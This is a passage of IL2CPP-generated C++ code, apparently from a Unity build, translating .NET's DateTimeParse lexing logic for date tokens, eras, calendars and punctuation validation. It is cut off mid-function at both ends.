(bool)0; } IL_0680: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_240 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_240, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0690: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_241 = ___dtok2; int32_t L_242 = V_1; L_241->set_num_2(L_242); DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_243 = ___raw3; DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_244 = ___dtok2; int32_t L_245 = L_244->get_num_2(); DateTimeRawInfo_AddNumber_m2E5EFAF94BCBCEA2B72C78B5D109377BB97D69F4((DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E *)L_243, L_245, /*hidden argument*/NULL); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_246 = ___str1; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** L_247 = ___dtfi5; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_248 = *((DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F **)L_247); int32_t L_249 = __DTString_GetSeparatorToken_m2F4CE10AC9C39A5380D3DD5344B81F79C7006EF1((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_246, L_248, (int32_t*)(&V_2), (Il2CppChar*)(&V_3), /*hidden argument*/NULL); int32_t L_250 = L_249; V_4 = L_250; V_5 = L_250; int32_t L_251 = V_5; if ((((int32_t)L_251) > ((int32_t)((int32_t)768)))) { goto IL_06d2; } } { int32_t L_252 = V_5; if ((((int32_t)L_252) == ((int32_t)((int32_t)512)))) { goto IL_06e6; } } { int32_t L_253 = V_5; if ((((int32_t)L_253) == ((int32_t)((int32_t)768)))) { goto IL_06f2; } } { goto IL_073e; } IL_06d2: { int32_t L_254 = V_5; if ((((int32_t)L_254) == ((int32_t)((int32_t)1536)))) { goto IL_06f2; } } { int32_t L_255 = V_5; if ((((int32_t)L_255) == ((int32_t)((int32_t)3840)))) { goto IL_06fe; } } { goto IL_073e; } IL_06e6: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_256 = ___dtok2; L_256->set_dtt_0(1); goto IL_0a4d; } IL_06f2: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_257 = ___dtok2; L_257->set_dtt_0(4); goto IL_0a4d; } IL_06fe: { IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_258 = ((DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_StaticFields*)il2cpp_codegen_static_fields_for(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var))->get_dateParsingStates_1(); int32_t L_259 = ___dps0; int32_t L_260 = L_259; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_261 = (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)(L_258)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_260)); int32_t L_262 = 4; int32_t L_263 = (int32_t)(L_261)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_262)); if ((!(((uint32_t)L_263) == ((uint32_t)((int32_t)20))))) { goto IL_0732; } } { IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_264 = ((DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_StaticFields*)il2cpp_codegen_static_fields_for(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var))->get_dateParsingStates_1(); int32_t L_265 = ___dps0; int32_t L_266 = L_265; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_267 = (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)(L_264)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_266)); int32_t L_268 = 3; int32_t L_269 = (int32_t)(L_267)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_268)); if ((((int32_t)L_269) <= ((int32_t)((int32_t)20)))) { goto IL_0732; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_270 = ___str1; int32_t L_271 = V_2; L_270->set_Index_1(L_271); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_272 = ___str1; Il2CppChar L_273 = V_3; L_272->set_m_current_3(L_273); DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_274 = ___dtok2; L_274->set_dtt_0(3); goto IL_0a4d; } IL_0732: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_275 = ___dtok2; L_275->set_dtt_0(4); goto IL_0a4d; } IL_073e: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_276 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_276, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_074e: { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_277 = ___raw3; int32_t L_278 = L_277->get_dayOfWeek_4(); if ((!(((uint32_t)L_278) == ((uint32_t)(-1))))) { goto IL_076b; } } { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_279 = ___raw3; int32_t L_280 = V_1; L_279->set_dayOfWeek_4(L_280); DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_281 = ___dtok2; L_281->set_dtt_0(((int32_t)11)); goto IL_0a4d; } IL_076b: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_282 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_282, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_077b: { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_283 = ___raw3; int32_t L_284 = L_283->get_month_2(); if ((!(((uint32_t)L_284) == ((uint32_t)(-1))))) { goto IL_0868; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_285 = ___str1; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** L_286 = ___dtfi5; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_287 = *((DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F **)L_286); int32_t L_288 = __DTString_GetSeparatorToken_m2F4CE10AC9C39A5380D3DD5344B81F79C7006EF1((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_285, L_287, (int32_t*)(&V_2), (Il2CppChar*)(&V_3), /*hidden argument*/NULL); int32_t L_289 = L_288; V_4 = L_289; V_5 = L_289; int32_t L_290 = V_5; if ((((int32_t)L_290) > ((int32_t)((int32_t)768)))) { goto IL_07b9; } } { int32_t L_291 = V_5; if ((((int32_t)L_291) == ((int32_t)((int32_t)512)))) { goto IL_07d6; } } { int32_t L_292 = V_5; if ((((int32_t)L_292) == ((int32_t)((int32_t)768)))) { goto IL_07df; } } { goto IL_084c; } IL_07b9: { int32_t L_293 = V_5; if ((((int32_t)L_293) == ((int32_t)((int32_t)1536)))) { goto IL_07e8; } } { int32_t L_294 = V_5; if ((((int32_t)L_294) == ((int32_t)((int32_t)1792)))) { goto IL_07f1; } } { int32_t L_295 = V_5; if ((((int32_t)L_295) == ((int32_t)((int32_t)3840)))) { goto IL_0812; } } { goto IL_084c; } IL_07d6: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_296 = ___dtok2; L_296->set_dtt_0(6); goto IL_085c; } IL_07df: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_297 = ___dtok2; L_297->set_dtt_0(7); goto IL_085c; } IL_07e8: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_298 = ___dtok2; L_298->set_dtt_0(8); goto IL_085c; } IL_07f1: { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_299 = ___raw3; bool L_300 = L_299->get_hasSameDateAndTimeSeparators_8(); if (L_300) { goto IL_0809; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_301 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_301, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0809: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_302 = ___dtok2; L_302->set_dtt_0(8); goto IL_085c; } IL_0812: { IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_303 = ((DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_StaticFields*)il2cpp_codegen_static_fields_for(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var))->get_dateParsingStates_1(); int32_t L_304 = ___dps0; int32_t L_305 = L_304; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_306 = (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)(L_303)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_305)); int32_t L_307 = 8; int32_t L_308 = (int32_t)(L_306)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_307)); if ((!(((uint32_t)L_308) == ((uint32_t)((int32_t)20))))) { goto IL_0843; } } { IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1* L_309 = ((DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_StaticFields*)il2cpp_codegen_static_fields_for(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var))->get_dateParsingStates_1(); int32_t L_310 = ___dps0; int32_t L_311 = L_310; DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E* L_312 = (DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E*)(L_309)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_311)); int32_t L_313 = 7; int32_t L_314 = (int32_t)(L_312)->GetAtUnchecked(static_cast<il2cpp_array_size_t>(L_313)); if ((((int32_t)L_314) <= ((int32_t)((int32_t)20)))) { goto IL_0843; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_315 = ___str1; int32_t L_316 = V_2; L_315->set_Index_1(L_316); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_317 = ___str1; Il2CppChar L_318 = V_3; L_317->set_m_current_3(L_318); DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_319 = ___dtok2; L_319->set_dtt_0(7); goto IL_085c; } IL_0843: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_320 = ___dtok2; L_320->set_dtt_0(8); goto IL_085c; } IL_084c: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_321 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_321, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_085c: { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_322 = ___raw3; int32_t L_323 = V_1; L_322->set_month_2(L_323); goto IL_0a4d; } IL_0868: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_324 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_324, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0878: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_325 = ___result4; int32_t L_326 = L_325->get_era_7(); if ((((int32_t)L_326) == ((int32_t)(-1)))) { goto IL_0897; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_327 = ___result4; int32_t L_328 = V_1; L_327->set_era_7(L_328); DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_329 = ___dtok2; L_329->set_dtt_0(((int32_t)16)); goto IL_0a4d; } IL_0897: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_330 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_330, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_08a7: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_331 = ___result4; IL2CPP_RUNTIME_CLASS_INIT(JapaneseCalendar_tF2E975159C0ADA226D222CE92A068FB01A800E92_il2cpp_TypeInfo_var); Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_332 = JapaneseCalendar_GetDefaultInstance_m2B83AF1289B7F75DC65BAAA788EEA02DEF9F021F(/*hidden argument*/NULL); L_331->set_calendar_10(L_332); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** L_333 = ___dtfi5; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F_il2cpp_TypeInfo_var); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_334 = DateTimeFormatInfo_GetJapaneseCalendarDTFI_mF905895C24DE13A3A53CE23530B4958DEE6EB50F(/*hidden argument*/NULL); *((RuntimeObject **)L_333) = (RuntimeObject *)L_334; Il2CppCodeGenWriteBarrier((RuntimeObject **)L_333, (RuntimeObject *)L_334); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_335 = ___result4; int32_t L_336 = L_335->get_era_7(); if ((((int32_t)L_336) == ((int32_t)(-1)))) { goto IL_08da; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_337 = ___result4; int32_t L_338 = V_1; L_337->set_era_7(L_338); DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_339 = ___dtok2; L_339->set_dtt_0(((int32_t)16)); goto IL_0a4d; } IL_08da: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_340 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_340, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_08ea: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_341 = ___result4; IL2CPP_RUNTIME_CLASS_INIT(TaiwanCalendar_t9531ECDB6DFA9E0D0F4123935DB61D0E97D43658_il2cpp_TypeInfo_var); Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_342 = TaiwanCalendar_GetDefaultInstance_mF5CD5C63640380B1122F443A98A15C8A68BFC1EF(/*hidden argument*/NULL); L_341->set_calendar_10(L_342); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** L_343 = ___dtfi5; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F_il2cpp_TypeInfo_var); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_344 = DateTimeFormatInfo_GetTaiwanCalendarDTFI_mB5B91430A2881BCBF7ADD581F1960B1BA6BBBB7B(/*hidden argument*/NULL); *((RuntimeObject **)L_343) = (RuntimeObject *)L_344; Il2CppCodeGenWriteBarrier((RuntimeObject **)L_343, (RuntimeObject *)L_344); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_345 = ___result4; int32_t L_346 = L_345->get_era_7(); if ((((int32_t)L_346) == ((int32_t)(-1)))) { goto IL_091d; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_347 = ___result4; int32_t L_348 = V_1; L_347->set_era_7(L_348); DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_349 = ___dtok2; L_349->set_dtt_0(((int32_t)16)); goto IL_0a4d; } IL_091d: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_350 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_350, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_092d: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_351 = ___result4; int32_t L_352 = L_351->get_flags_8(); if (!((int32_t)((int32_t)L_352&(int32_t)((int32_t)256)))) { goto IL_094c; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_353 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_353, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_094c: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_354 = ___dtok2; L_354->set_dtt_0(((int32_t)15)); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_355 = ___result4; int32_t* L_356 = L_355->get_address_of_flags_8(); int32_t* L_357 = L_356; int32_t L_358 = *((int32_t*)L_357); *((int32_t*)L_357) = (int32_t)((int32_t)((int32_t)L_358|(int32_t)((int32_t)256))); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_359 = ___result4; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_360; memset(&L_360, 0, sizeof(L_360)); TimeSpan__ctor_mEB013EB288370617E8D465D75BE383C4058DB5A5((&L_360), (((int64_t)((int64_t)0))), /*hidden argument*/NULL); L_359->set_timeZoneOffset_9(L_360); DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_361 = ___result4; int32_t* L_362 = L_361->get_address_of_flags_8(); int32_t* L_363 = L_362; int32_t L_364 = *((int32_t*)L_363); *((int32_t*)L_363) = (int32_t)((int32_t)((int32_t)L_364|(int32_t)((int32_t)512))); goto IL_0a4d; } IL_0987: { DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * L_365 = ___dtok2; L_365->set_dtt_0(0); goto IL_0a4d; } IL_0993: { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_366 = ___raw3; int32_t L_367 = L_366->get_timeMark_6(); if ((!(((uint32_t)L_367) == ((uint32_t)(-1))))) { goto IL_09a8; } } { DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * L_368 = ___raw3; int32_t L_369 = V_1; L_368->set_timeMark_6(L_369); goto IL_0a4d; } IL_09a8: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_370 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_370, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_09b8: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_371 = ___str1; Il2CppChar L_372 = L_371->get_m_current_3(); IL2CPP_RUNTIME_CLASS_INIT(Char_tBF22D9FC341BE970735250BB6FF1A4A92BBA58B9_il2cpp_TypeInfo_var); bool L_373 = Char_IsLetter_mCC7F387F16C2DE7C85B6A1A0C5BC75D92A813DFE(L_372, /*hidden argument*/NULL); if (!L_373) { goto IL_09df; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_374 = ___result4; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_375 = ___str1; int32_t L_376 = L_375->get_Index_1(); int32_t L_377 = L_376; RuntimeObject * L_378 = Box(Int32_t585191389E07734F19F3156FF88FB3EF4800D102_il2cpp_TypeInfo_var, &L_377); DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_374, 3, _stringLiteral84B98C10F6DEA1BB27F4A35E553BA97F41DFF0E2, L_378, /*hidden argument*/NULL); return (bool)0; } IL_09df: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_379 = ___str1; Il2CppChar L_380 = L_379->get_m_current_3(); if ((((int32_t)L_380) == ((int32_t)((int32_t)45)))) { goto IL_09f3; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_381 = ___str1; Il2CppChar L_382 = L_381->get_m_current_3(); if ((!(((uint32_t)L_382) == ((uint32_t)((int32_t)43))))) { goto IL_0a33; } } IL_09f3: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_383 = ___result4; int32_t L_384 = L_383->get_flags_8(); if (((int32_t)((int32_t)L_384&(int32_t)((int32_t)256)))) { goto IL_0a33; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_385 = ___str1; int32_t L_386 = L_385->get_Index_1(); V_8 = L_386; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_387 = ___str1; DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_388 = ___result4; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * L_389 = L_388->get_address_of_timeZoneOffset_9(); IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_390 = DateTimeParse_ParseTimeZone_mA74CA520A5B9C842CCD4E602AC325C43CFF7C0DF((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_387, (TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 *)L_389, /*hidden argument*/NULL); if (!L_390) { goto IL_0a2b; } } { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_391 = ___result4; int32_t* L_392 = L_391->get_address_of_flags_8(); int32_t* L_393 = L_392; int32_t L_394 = *((int32_t*)L_393); *((int32_t*)L_393) = (int32_t)((int32_t)((int32_t)L_394|(int32_t)((int32_t)256))); return (bool)1; } IL_0a2b: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_395 = ___str1; int32_t L_396 = V_8; L_395->set_Index_1(L_396); } IL_0a33: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_397 = ___str1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeParse_t657E38D9FF27E5FD6A33E23887031A86248D97D4_il2cpp_TypeInfo_var); bool L_398 = DateTimeParse_VerifyValidPunctuation_m299ECDE17C72C83E5CE0D00DE1AB48930634DE99((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_397, /*hidden argument*/NULL); if (!L_398) { goto IL_0a3d; } } { return (bool)1; } IL_0a3d: { DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * L_399 = ___result4; DateTimeResult_SetFailure_m11422FBCA061FEADE4861130A423E48E4A509F24((DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB *)L_399, 2, _stringLiteral5CE33F32669AF0A628F2E23DF78AE8639C9BCA3C, NULL, /*hidden argument*/NULL); return (bool)0; } IL_0a4d: { return (bool)1; } IL_0a4f: { bool L_400 = V_7; return L_400; } } // System.Boolean System.DateTimeParse::VerifyValidPunctuation(System.__DTString&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_VerifyValidPunctuation_m299ECDE17C72C83E5CE0D00DE1AB48930634DE99 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeParse_VerifyValidPunctuation_m299ECDE17C72C83E5CE0D00DE1AB48930634DE99_MetadataUsageId); s_Il2CppMethodInitialized = true; } Il2CppChar V_0 = 0x0; bool V_1 = false; bool V_2 = false; int32_t V_3 = 0; int32_t V_4 = 0; { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_0 = ___str0; String_t* L_1 = L_0->get_Value_0(); __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_2 = ___str0; int32_t L_3 = L_2->get_Index_1(); Il2CppChar L_4 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_1, L_3, /*hidden argument*/NULL); V_0 = L_4; Il2CppChar L_5 = V_0; if ((!(((uint32_t)L_5) == ((uint32_t)((int32_t)35))))) { goto IL_0076; } } { V_1 = (bool)0; V_2 = (bool)0; V_3 = 0; goto IL_005f; } IL_001f: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_6 = ___str0; String_t* L_7 = L_6->get_Value_0(); int32_t L_8 = V_3; Il2CppChar L_9 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_7, L_8, /*hidden argument*/NULL); V_0 = L_9; Il2CppChar L_10 = V_0; if ((!(((uint32_t)L_10) == ((uint32_t)((int32_t)35))))) { goto IL_0041; } } { bool L_11 = V_1; if (!L_11) { goto IL_003d; } } { bool L_12 = V_2; if (!L_12) { goto IL_0039; } } { return (bool)0; } IL_0039: { V_2 = (bool)1; goto IL_005b; } IL_003d: { V_1 = (bool)1; goto IL_005b; } IL_0041: { Il2CppChar L_13 = V_0; if (L_13) { goto IL_0049; } } { bool L_14 = V_2; if (L_14) { goto IL_005b; } } { return (bool)0; } IL_0049: { Il2CppChar L_15 = V_0; IL2CPP_RUNTIME_CLASS_INIT(Char_tBF22D9FC341BE970735250BB6FF1A4A92BBA58B9_il2cpp_TypeInfo_var); bool L_16 = Char_IsWhiteSpace_m8AE1C4157A1E1D8F5022630F4229AB26223BDC6B(L_15, /*hidden argument*/NULL); if (L_16) { goto IL_005b; } } { bool L_17 = V_1; bool L_18 = V_2; if (!((int32_t)((int32_t)((((int32_t)L_17) == ((int32_t)0))? 1 : 0)|(int32_t)L_18))) { goto IL_005b; } } { return (bool)0; } IL_005b: { int32_t L_19 = V_3; V_3 = ((int32_t)il2cpp_codegen_add((int32_t)L_19, (int32_t)1)); } IL_005f: { int32_t L_20 = V_3; __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_21 = ___str0; int32_t L_22 = L_21->get_len_2(); if ((((int32_t)L_20) < ((int32_t)L_22))) { goto IL_001f; } } { bool L_23 = V_2; if (L_23) { goto IL_006d; } } { return (bool)0; } IL_006d: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_24 = ___str0; __DTString_GetNext_mA99D360775F54B38E339C68D2E6007B7E028E1A3((__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 *)L_24, /*hidden argument*/NULL); return (bool)1; } IL_0076: { Il2CppChar L_25 = V_0; if (L_25) { goto IL_00b2; } } { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_26 = ___str0; int32_t L_27 = L_26->get_Index_1(); V_4 = L_27; goto IL_009a; } IL_0083: { __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * L_28 = ___str0; String_t* L_29 = L_28->get_Value_0(); int32_t L_30 = V_4; Il2CppChar L_31 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_29, L_30, /*hidden 